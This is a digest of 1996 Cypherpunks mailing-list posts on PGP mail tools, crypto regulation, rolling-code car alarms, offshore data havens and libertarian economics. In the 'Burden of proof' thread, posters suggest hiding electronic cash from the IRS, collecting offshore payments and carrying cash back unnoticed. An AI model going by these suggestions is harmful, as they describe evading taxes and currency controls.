Subject: Re: PGP/Unix scripts, mail proggies?
In-Reply-To: <Pine.BSI.3.93.960815110720.16514A-100000@descartes.forequest.com>
Message-ID: <Pine.SV4.3.91.960815153301.10737N-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 15 Aug 1996, Jeremey Barrett wrote:
 
> On Thu, 8 Aug 1996, Chris Lee wrote:
> 
> > Hello all,
> >
> > 	I joined this list a while ago and am curious whether a there is a
> > simple way to encrypt/decrypt e-mail with PGP in a Linux(Unix)
> > enviroment...?  Sorry if this has been answered a thousand times, but it
> > would really make PGP a more viable option with my small ISP.
> >
> > Thank you very much for any answers, please reply to me personally.
> >
> 
> Here's what I use, a simple sh script with pine for signing/encrypting.
> 
> #!/bin/sh
> 
> # Written by:  Jeremey Barrett <jeremey@forequest.com>
> #
> # Simple as hell sh script for automating PGP. I use pine, and have not
> # tried this with any other mailer, but it should work. The version of this I
> # use asks all kinds of questions about using remailers and nym servers
> # before editing the mail, so it can toss in templates and such. Anyway,
> # hack this at will.
> #

<deletia>

There is also a utilitie I use called mkpgp. It also envokes the 
alternate editor for encryption and decryption of signed mail. It also 
has an extensive readme and help files. To get it you can do the 
following: 

If you send blank e-mail to slutsky@lipschitz.sfasu.edu with
        Subject: mkpgp

They will mail you everything you need to get started. It took me about 
20 Minutes to get it up and running. 

  Greg Demetrick 

  Pub Key: http://www.infi.net/~gjdemetr/greg.txt




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp2.0, a Pine/PGP interface.

iQB1AwUBMhN8LkHPUq9jfdGZAQH+bQL+MeJSM/WsDKpoeAp1yT/kQth3CoPqJirJ
ei3FigQ024ThLZSjcaNjK212ynmpojEcGAepEzJ4jQc8Lgd2WII9ZGi3tpbCh7tB
OaxUDqV2sTHvkvGUvA/ByVwOe80uwpdd
=4h3N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Checkered Daemon <cdaemon@goblin.punk.net>
Date: Fri, 16 Aug 1996 09:34:22 +0800
To: m5@vail.tivoli.com (Mike McNally)
Subject: Re: Crypto Ban Talk @ G-7
In-Reply-To: <321333D4.2003@vail.tivoli.com>
Message-ID: <199608152240.PAA23570@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


Mike M Nally chimes in with:
 
> Declan McCullagh wrote:
> > 
> > I have the text of the resolution passed by G-7 and Russia that
> > moves towards greater controls on crypto at:
> 
> I just have to wonder whether these people expect their measures to
> really reduce terrorism, or if they simply expect to be able to
> identify and imprison/kill all the terrorists so that terrorism can 
> be eliminated like smallpox.
> 
> If the former, I'd say they're stupid, and if the latter, well, I'd
> say they're stupid.

None of this has anything to do with terrorism, or any of the other
'horsemen'.  It has to do with the survival of national governments as
we presently know them.  These people are not completely stupid.

Totally secure, world-wide data networks WILL spell the end of national
governments.  This cannot be allowed.  The horsemen aspect is just there
for popular consumption.

-- 
Checkered Daemon                              cdaemon@goblin.punk.net

Delirium:  There must be a word for it ... the thing that lets you know that
           TIME is happening.  IS there a word?
Sandman:   CHANGE.
Delirium:  Oh.  I was AFRAID of that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 16 Aug 1996 07:14:51 +0800
To: cypherpunks@toad.com
Subject: Re: Press Release: Apple's CyberDog Web Bowser
In-Reply-To: <ae38c2670702100409e3@[205.199.118.202]>
Message-ID: <v03007802ae393083ccea@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:02 PM -0400 8/15/96, Timothy C. May wrote:
> *** PRESS RELEASE ***
> 
> APPLE COMPUTER UNLEASHES CYBERDOG WEB BOWSER
<snif^hp>
> Those interested in taking CyberDog out for a walk, or just sniffing its
> butt ...
<snif^hp>

Cyberdog doesn't suck. 

It licks.

Why?

Because it can.


<eewwwww!>

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Fri, 16 Aug 1996 02:02:29 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB8AC5.1B326AE0@groningen10.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger wrote:

>No one claimed that you can't increase productivity and income on
average under some circumstances by increased capital investment. What
was being made fun of was the simplistic misunderstanding of what the
underlying mechanisms are. Prices, including the price of labor, are
set purely by the marketplace.Under some circumstances, incomes will
be determined by investment levels made by employers. Under others,
they will not.  The important feature is the market principle, not the
capital investment. The point of my "green pylons" posting was to note
that it is the market direction of the investment and not the
investment that is important.<

If you mean to say that in a society where the government directs the 
'investments' (confiscates the wealth of its citizens and spends it for its 
own purposes), wages could be lower than in a society where there is less 
capital accumulated but where private parties direct the investments, then 
you are right. But Austrian economists like Murray Rothbard, Hans 
Hermann Hoppe, etc. don't consider government expenditures to be 
*investments* of capital; they consider all government expenditures to be 
*consumption*. As an Austrian, you should know this. To quote Murray 
Rothbard about resource-using expenditures by the government ('Power 
and market', p. 173, 2nd ed.): "all of this expenditure must be considered 
*consumption*. Investment occurs where producers' goods are bought by 
entrepreneurs, not at all for their own use or satisfaction, but merely to 
reshape and resell them to others - ultimately to the consumers. But 
government redirects the resources of society to its ends, chosen by it 
and backed by the use of force. Hence, these purchases must be 
considered consumption expenditures, whatever their intention or physical 
result. They are a particular wasteful form of 'consumption', however, since 
they are generally *not* regarded as consumption expenditures by 
government officials" Etc.
By the way, Jean-Baptiste Say, the French economist, already had the 
same view a long time ago.

 >Impediments to trade create wastes of
capital just as surely as burning cash in the marketplace does. If you
were really an Austrian, and not a confused person, you would know
that all the Austrians and Chicago School people are for completely
free trade, something you don't seem to get in your expositions on
capital flows.

Perry<

You're setting up a straw man again. As I said several times before, I *am* 
for completely free trade. Even if the investment of American capital in 
foreign countries would lead to a lower standard of living for workers in the 
US, I still would support completely free trade, simply because I support 
the non-aggression principle. But, as I also said before, I don't believe that 
investment of American capital abroad would lead to a lower standard of 
living for American workers (it would lead to relatively lower wages, but I 
think the advantages of investing abroad would compensate for this). I just 
don't know how to *prove* this belief. I like to have proof for my beliefs, 
if only to be able to rebut socialist arguments. That's why I asked my 
question: how can you prove that the investment of American capital 
abroad would not hurt workers in the US? 

Bart Croughs










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Cobb <stephen@iu.net>
Date: Fri, 16 Aug 1996 07:23:42 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Stopped Clock. Was: Schlafly on Crypto
Message-ID: <1.5.4.32.19960815201644.00b5fe20@iu.net>
MIME-Version: 1.0
Content-Type: text/plain


Speaking as someone who seldom agrees with Phyllis Schlafly...and not
meaning to be overly ignorant or paranoid or disrespectful, but is there any
link between her column and Roger Schlafly, as in:

Schlafly v. Public Key Partners & RSA Data Security, Case C-94-20512 SW PVT

or is it mere coincidence.

Reminds me of the Doonesbury cartoon of conspiracy theorists, circa O.J.
case: "Wait a minute, Hertz has an office in Dallas."
"Coincidence?"
"I don't think so."

Stephen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Fri, 16 Aug 1996 08:44:24 +0800
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: forget photographing license plates!
In-Reply-To: <Pine.SUN.3.91.960815144122.26417A-100000@tipper.oit.unc.edu>
Message-ID: <199608152134.QAA17950@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Another UK vehicle security reply (disclaimer: my dad's company installs 
> alarms, imobilisers, lojack/skynet, etc.)
> 
> The first generation of remote-keyed car-alarms used a static key. It 
> didn't take long before people had modified scanners to record the key 
> and play it back as soon as the driver had left. 
> 
> The current generation uses what is described as "rolling code random 
> encryption". From what I could work out from talking to people, this 
> scheme works something like a one time password scheme, but with no 
> feedback from server (car) to client (keyfob). It seems that the keyfob 
> has persistent state in the form of a  counter, which is incremented 
> every time the key is pressed. This counter is combined with the 
> encryption key and the resulting cyphertext is then transmitted.
> 
>  The car keeps a record of the last successful sequence number, and will 
> not allow earlier sequences to be replayed. The car will accept sequence 
> numbers within a certain range of the last successful one, in case a 
> particular try is not recieved, or the key is jostled in ones pocket.
> 
> I don't know how strong the algorithms are, or how long the keys are; 
> there are supposed to be minimum requirements on key length, but I don't 
> know if the approval body evaluates the crypto.
> 
> Simon

That is known for cars.  I double checked, and found some car alarms able
to do this.  However, I have not found any house garage door openers able
to pull this off.  Most still use the old blurt code method.

Ironically, there are gate openers which have this technology in them
(rolling code.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 16 Aug 1996 13:13:06 +0800
To: cypherpunks@toad.com
Subject: Garage door openers
Message-ID: <ae390e4808021004ddf3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:34 PM 8/15/96, Douglas R. Floyd wrote:

>That is known for cars.  I double checked, and found some car alarms able
>to do this.  However, I have not found any house garage door openers able
>to pull this off.  Most still use the old blurt code method.
>

Sure, most garage door opener codes are easy to break....but how many
thieves who do this know to enter the _second_ correct sequence within 45
seconds, the one that stops the poison gas from filling the garage?

Steganographic entry codes have their uses.

--Tim May

(P.S. There were six (6) names copied on this post, besides CP. Can't we
edit the cc: lines? I try to, so why don't you all?)

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 16 Aug 1996 13:02:18 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla - A DataHaven?
Message-ID: <ae390f98090210042cdd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:55 PM 8/15/96, William Knowles wrote:
>On Thu, 15 Aug 1996, Arun Mehta wrote:
>
>> I'm sure this has come up before, but what would prevent a server
>> being located on a buoy or something at sea outside territorial
>> limits (or when satellites become cheaper, on a satellite itself)
>> offering such services?
>
>Something that I thought would make an excellent data haven would
>be older offshore oil platforms, Their size would allow extended
>living periods, electrcity and communications are in place, They
>are generally built outside of the territorial waters of most
>countries to avoid any damage to the shorelines if oil spilled
>(possibility for becoming its own country?) and with the hoops
>that Shell Oil went through to please Greenpeace with its last
>oil platform.  You have to wonder how cheap these could sell
>for just to get them off the oil companies hands?
>
>Comments or suggestions?

As with offshore buoys, how long do you think such an entity would last?

You mentioned Greepeace...don't forget that the French intelligence
apparatus sunks a Greenpeace ship in a New Zealand harbor. Don't forget the
way the U.S. mined Managua's harbor. And so on.

Think of how any of these schemes are vulnerable to a cheap torpedo,
"anonymously mailed" from several miles away.

Oil rigs, buoys, pirate ships....these are all examples of hopelessly
insecure systems. I could say more, but what's the point?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DAVID A MOLNAR <molnard1@nevada.edu>
Date: Fri, 16 Aug 1996 11:22:30 +0800
To: Robin Powell <rpowell@algorithmics.com>
Subject: Re: Burden of proof
In-Reply-To: <96Aug15.132311edt.20486@janus.algorithmics.com>
Message-ID: <Pine.OSF.3.91.960815172937.17110A-100000@pioneer.nevada.edu>
MIME-Version: 1.0
Content-Type: text/plain



> This relates to something I have been wondering about:  If one could
> get one's company to pay one in electronic cash, what is to stop one
> from piling the coins in a Datahaven somewhere (assuming one existed
> that would be usable for these purposes) and say to the IRS: Money?
> What money?  Can you find any of my money?  I, uhh... lost it!  Yeah,
> that's it!!
	What is to stop the IRS from pointing out that you received the 
money from your employer? Maybe you could convince them you were unable 
to pay, but that would require squirreling away(and refraining from 
using) all your assets. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 16 Aug 1996 11:07:11 +0800
To: cypherpunks@toad.com
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <ae3911110a0210048570@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:39 PM 8/15/96, Bart  Croughs wrote:

>
> If the situation is so clear, why can't you give the proof I'm asking for?
>

Several people have given explanations of why your question is both too
simplistic and too tied to subjective definitions of "good for the
economy." You ignore these points and keep repeating your protectionist
mantra.

You seem to have a one-track mind, suggesting you are probaby a rabid
Objectivist. OK, so I will give you an Objectivist proof:

A is A. Not-A is not Not-Not-A. A is real, Not-A is not real. Reality is
good, non-reality is not good. Man exists in reality. Therefore Man is
good. Existence is not optional. Non-existence is nothingness. Nothingness
is darkness. The opposite of darkness is light. Fire produces light,
therefore fire is good. Fire is the embodiment of good. Smoking is the
embodiment of fire. Therefore, smoking is good. Non-smoking is bad....

What was the question again?

--Tim May

(P.S. Since Bart seems to have only one thing on his mind, and since our
list members seem unable to persuade him about anything, I suspect this
list is not the list for Bart. May he find the list he seeks.)

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott McGuire <svmcguir@syr.edu>
Date: Fri, 16 Aug 1996 08:25:21 +0800
To: cypherpunks@toad.com
Subject: Re: National Socio-Economic Security Need for Encryption Technology Re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <01BB89EA.FB826540@groningen08.pop.tip.nl>
Message-ID: <ML-2.2.840145964.9124.scott@homebox.>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>From:      Bart  Croughs
>
>You haven't answered this question yet. I don't claim that the U.S. is
>worse off when US capital moves abroad. I only ask: how can you proof
>that the US isn't worse off when US capital moves abroad? 

I recall you were interested in how the Austrians would answer this.  I
think that they would object to the question because of their aversion to
aggregates.  Some individuals are better off and some worse off.  The
Austrians would deny that you can sum the results for individuals and get
a result for the economy as a whole.  This is because of Austrian
subjectivity.

Assume that I move a programming job to India, and make the required
capital investments.

I am presumably better off (otherwise I wouldn't have moved the capital).

The worker I fire here in the US is worse off.

(Other effects you have mentioned go here).

Now, considering only me and the laid off worker, is this change overall
good or bad?  To answer this, you would have to compare the value of my
gain to the value of the workers loss.  But you can't.  Value is
subjective.  And, it only gets harder when you try to take into account
the other people affected.

P.S.
Bart, your quotes of other people are hard to follow.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBMhObE97xoXfnt4lpAQEU2AQAtllFg2gajiVhZqQoEJ5+yP9JvalU6ZiZ
MD0L8CB+P04r0ICHrP2uhj40IUj2MTrb62JcHqKjrW5QU/51u+F4OfAryB4uHivH
qz3WiAbscQgZTOf/zRyU7hBCSxQkYE/CZeDPjXPs8++6a0TvmJTlNp9KpJ1wIwgz
eGgkhKQoaPY=
=6ytQ
-----END PGP SIGNATURE-----

--------------------
Scott McGuire <svmcguir@syr.edu>
PGP key available at http://web.syr.edu/~svmcguir





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 16 Aug 1996 12:14:51 +0800
To: cypherpunks@toad.com
Subject: Re: Burden of proof
Message-ID: <ae391d630b0210046a57@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:25 PM 8/15/96, Scottauge@aol.com wrote:
>In a message dated 96-08-15 17:35:20 EDT, you write:
>
>> This relates to something I have been wondering about:  If one could
>>  get one's company to pay one in electronic cash, what is to stop one
>>  from piling the coins in a Datahaven somewhere (assuming one existed
>>  that would be usable for these purposes) and say to the IRS: Money?
>>  What money?  Can you find any of my money?  I, uhh... lost it!  Yeah,
>>  that's it!!
>
>But then how do you spend it?  What if instructions are given to the banking
>system to not deal with such and such bank (or datahaven)?  How are you going
>to get it out and spend them deniros?

This is practically the least of the concerns.

Assuming one could, say, be paid reliably and without True Name attached,
in a country like Anguilla (to use a current example), it would be simple
enough to fly to Anguilla for a vacation, pick up the money, and return to
the U.S.

I've never had my bags searched on an incoming flight, and even if one is
fearful of this, there are multiple ways to get the cash back.

This is not an ideal, pure crypto anarchist solution, but it certainly
shows that getting the payments made to an offshore account is much more
than half the battle.

(I hear that some consultants to offshore companies are already doing
something like this--they consult for some large fee, e.g., $200K, and then
arrange to be paid out over a period of many years on a contingency basis.
This reduces taxes, at least on this payment, considerably. And they can,
while in Macao, or Singapore, etc., transfer money around the world to
various locales they may visit in the future....)

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 16 Aug 1996 09:38:32 +0800
To: erehwon@c2.org (William Knowles)
Subject: Re: Anguilla - A DataHaven?
In-Reply-To: <Pine.SUN.3.94.960815104107.8090A-100000@infinity.c2.net>
Message-ID: <199608152235.SAA03915@nrk.com>
MIME-Version: 1.0
Content-Type: text


erehwon@c2.org:
> Something that I thought would make an excellent data haven would
> be older offshore oil platforms.

I recall the Royal Navy raiding WWII era Anti-Aircraft platforms
that were housing pirate BBC competitors....

This was in the 60's I think....



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Greg Kucharo" <sophi@best.com>
Date: Fri, 16 Aug 1996 13:19:00 +0800
To: <tcmay@got.net>
Subject: Re: Anguilla...etc.
Message-ID: <199608160154.SAA20349@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


  I guess the point I was trying to make all along is this; Is a data haven
going to be a security through obscurity operation?  This is what the Swiss
have with secret bank accounts, etc.  Or will it be an operation where the
operator of the system lets whatever on, and hopes he won't get prosecuted.
In Island in the Net, the haven were physical.  The authorities got to them
eventually.  Vince's system is restricted by physical laws.  There will
always be a finite array of information he can present without putting the
whole operation on the line.
  Is he still a data haven then?  I believe so.  But through creative
diplomacy he could balance the powers that bind him.  How well he or anyone
else does this is the key to the range of information presented.

----------
> From: Timothy C. May <tcmay@got.net>
> To: cypherpunks@toad.com
> Subject: Re: Anguilla...etc.
> Date: Tuesday, August 13, 1996 9:07 PM
> 
> At 2:21 AM 8/14/96, Greg Kucharo wrote:
> >  While Tim may be right that nobility is lost when backing down to the
> >authorities, the fact is that this game has little to do with noble
> >purposes.  Check that, obvious noble purposes.  While most on this list
> >would agree that free flow of information is noble we have all seen that
> >this is otherwise with people in power.  As I stated in my last post,
the
> >Swiss have maintained thier "haven" for many years by playing both
sides.
> >In accomodating everyone they avoid harassment.
> >   This way the Swiss maintain a good system and live to fight another
day.
> 
> Let me be clear that I am not talking about "noble motives." In the sense
> of somone sacrificing himself for the good of the herd, blah blah.
> 
> Rather, there is an "archetype," if you will, of what a "remailer" is,
what
> a "data haven" is, what a "tax shelter" is, etc. While we cannot
reasonably
> expect a remailer to exactly match the archetype, we can point out
obvious
> deficiencies.
> 
> For "data havens," we have very few examples, compared to operational
> remailers. We have the fictional form in Bruce Sterling's "Islands in the
> Net," some of whose plot twists have some parallels to the current
Anguilla
> situation. Another is the form described in Ross Anderson's "Eternity
> Service."
> 
> What might we expect of a true data haven? I've tried to describe several
> of the attributes in my earlier posts, mainly by asking questions about
> specific examples (bomb-building instructions, "Kill the monarchy"
screeds,
> etc.).
> 
> Interestingly, with several of these examples, Vince has said that he is
> not interested in having this kind of material on his site. His
invitation
> for Multi-Level Marketers to avoid U.S. and other laws by locating on his
> service has now been withdrawn, from his latest comments. (To the person
> who sent me mail explaining that MLM schemes are not illegal in the U.S.,
> indeed, some are legal and some are not. I said as much. And for those
> which are legal in the U.S. or France or wherever, they would hardly have
> any need to use Vince's service, would they? I surmised from his
invitation
> that he was encouraging MLM/pyramid scheme operators to avoid their
> parochial fraud laws and use the services in Anguilla.)
> 
> I plan to do more looking at just who is left, who is using Offshore
> Information and what kinds of services they are offering. Not to harass
> Vince, of course, but to better look at the envelope of what is
considered
> OK and what is not.
> 
> If i find that all the "juicy" stuff is gone and all that is left is
> booking sailing cruises around the Carribbean, I'll hardly call it a
"data
> haven." Which is not to say it's not still a useful and profitable
business
> for Vince, just that it has no Cypherpunk relevance.
> 
> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't
allowed.
>
---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms,
zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information
markets,
> Licensed Ontologist         | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information
superhighway."
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Greg Kucharo" <sophi@best.com>
Date: Fri, 16 Aug 1996 13:04:00 +0800
To: "Vincent Cate" <cypherpunks@toad.com>
Subject: Re: Anguilla - A DataHaven?
Message-ID: <199608160202.TAA21122@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


The only ideal I can think of would be the fictional "Port Watson".  What
is you had a system that spanned countries, using the internet as a linking
device.  It would be the same service.  But when you specified the kind of
data you wanted to post, the system would route it to the appropriate
server in a country where it wasn't illegal. 

----------
> From: Vincent Cate <vince@offshore.com.ai>
> To: cypherpunks@toad.com
> Subject: Anguilla - A DataHaven?  
> Date: Wednesday, August 14, 1996 5:40 AM
> 
> 
> Tim:
> > Rather, there is an "archetype," if you will, of what a "remailer" is,
what
> > a "data haven" is, what a "tax shelter" is, etc. While we cannot
reasonably
> > expect a remailer to exactly match the archetype, we can point out
obvious
> > deficiencies.
> 
> 1)  Anguilla has secrecy laws.  Professional relationships are
confidential.
>     There are strong secrecy laws.  I have not given out taxbomber's
>     name, nor will I as I could face legal action if I did.
> 
> 2)  Anguilla has no sales or income taxes.  A business does not need to
>     report anything about income, sales, etc, to the government (or
anyone
>     else).  If a guy wants to sell his data and keep 100% of the profits
>     instead of 50% or 60%, then Anguilla would be a haven for him.
> 
> 3)  We don't have the same laws as other countries, so there are things
>     that can be done here.  For example, we can export encryption 
>     software.  Also, we will have bingo.com in Anguilla.
> 
> There are deficiencies from a cypherpunk or Libertarian point of view.
And
> these are interesting.  And exactly what I want to do is changing. As I
> said, Anguilla is not the datahaven of cypherpunks wet dreams.  I am sure
> there are no datahavens that match the cypherpunk concept of an ideal
> datahaven, yet. 
> 
> But I think the term DataHaven applies as well to Anguilla as any other
> place I know of.  
> 
> Tim, we would all be very happy if you were to locate a country that
could
> be the site of the ideal datahaven, and finance a couple cypherpunks to
> setup there.  It would be a big help to our cause.  Could you do this? 
> 
> In the mean time, people may have to exist in cyberspace (like
> www.taxbomber.com) without having a totally secure physical location. 
> This is not the end of the world, or really even that painful.  If done
> right you could be down for only an hour - just long enough for
> nameservers to change.  Taxbomber is now setup to do it very fast next
> time, if the need ever comes.  Tim, I think you have even advocated this
> approach, not stressing the physical location, just the cyberspace
> location.  No? 
> 
>    --  Vince
> 
> -----------------------------------------------------------------------
> Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
> Offshore Information Services         http://www.offshore.com.ai/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mike@fionn.lbl.gov (Michael Helm)
Date: Fri, 16 Aug 1996 12:46:51 +0800
To: cypherpunks@toad.com
Subject: Re: Burden of proof
Message-ID: <199608160210.TAA04062@fionn.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Aug 15,  7:25pm, Scottauge@aol.com wrote:
> system to not deal with such and such bank (or datahaven)?  How are you going
> to get it out and spend them deniros?

Make 'em an offer they can't refuse ?^)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Fri, 16 Aug 1996 10:16:14 +0800
To: cypherpunks@toad.com
Subject: Re: Burden of proof
Message-ID: <960815192512_457514748@emout07.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-08-15 17:35:20 EDT, you write:

> This relates to something I have been wondering about:  If one could
>  get one's company to pay one in electronic cash, what is to stop one
>  from piling the coins in a Datahaven somewhere (assuming one existed
>  that would be usable for these purposes) and say to the IRS: Money?
>  What money?  Can you find any of my money?  I, uhh... lost it!  Yeah,
>  that's it!!

But then how do you spend it?  What if instructions are given to the banking
system to not deal with such and such bank (or datahaven)?  How are you going
to get it out and spend them deniros?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 16 Aug 1996 13:06:17 +0800
To: cypherpunks@toad.com
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches
Message-ID: <ae392bc40c021004cb4a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:01 AM 8/16/96, Alan Horowitz wrote:
>I repeat.  Generations of sweating engineers have discovered and confirmed
>that there is not an easy, "Silver Bullet" cure of the canonical problem
>of shielding electromagnetic energy from reaching someone who knows how
>to interpret it.
>
>Bill, you are welcome to look at a layer of tin foil and give a sigh of
>relief that you've shielded your gun or your crypto diskette or your
>private body parts feom someone who knows what they're doing.  Go ahead,
>chant a mantra too, if it makes you feel better.+-


I've stayed out of this "tin foil" debate, but some basic physics is being
missed, or misused.

The invocation of TEMPEST and leakage of RF does not say much of anything
about _imaging_. If a gun, for example, were _radiating_ RF energy of some
particular sort, then it might indeed be true that tin foil/gold lame
shielding would not stop _all_ of the emitted radiation, and that sensitive
enough detectors might detect the characteristic signal 60 or 90 dB down.
Maybe.

But a gun is not a radiator, it is at most a _reflector_ of RF energy.
Thus, the TEMPEST invocation is misleading. The signal would perhaps be
down by 100-130 dB or more, as the "leakage" must first get around the
shielding, be reflected, and then get back around the shielding.

And what this does to "imaging" almost needs no explanation. What leaks
around the periphery or through holes in a shielded container will provide
essentially zero spatial information about the configuration of sources and
reflectors inside the shielded container.

(I spent much of 1972-73 working inside a Faraday cage on ultra-low-noise
superconducting Josephson junctions. Believe me, what signals leaked in, or
leaked out (by symmetry analysis) could not have been used to deduce the
configuration of sources and reflectors inside the room.)

I should say I'm skeptical that millimeter detectors will be widely
deployed anytime soon. For detecting concealed weapons, "metal detectors"
in specific locations are both cheaper and have fewer constitutional and
"false positive" problems.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Fri, 16 Aug 1996 06:23:05 +0800
To: cypherpunks@toad.com
Subject: remailers/kiddie porn
Message-ID: <199608151739.TAA13029@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Internet Child Porn An Issue At Stockholm Congress

STOCKHOLM - Distribution of child pornography on the Internet seems destined to top the issues at the world's first conference against sexual exploitation of
children opening later this month in Stockholm. 

Activists are trying to devise ways of keeping pedophiles from peddling such material on the global computer network, which is already used as a billboard to
advertise prostitution and sex tourism and to exchange adult pornography. 

But not everyone agrees that regulating the Internet or its 20 million users worldwide is the right move. 

Some advocates say the Internet represents free speech. 

Others argue that the distribution of child pornography on the Internet is not that widespread. 

Still, many see it as a problem. 

"The Internet is like heaven for the pedophile," said Toby Tyler, a United States police officer who lectures at the FBI Academy on child abuse. 

"As far as our ability to restrict the distribution of child pornography and stop the sexual exploitation of children on the Internet...it's not something that can be done."

Campaigners are concerned that unless urgent action is taken to stamp out the Internet's distribution of child porn, whether it features real children or just computer
generated images, it could spark greater demand for child pornography. 

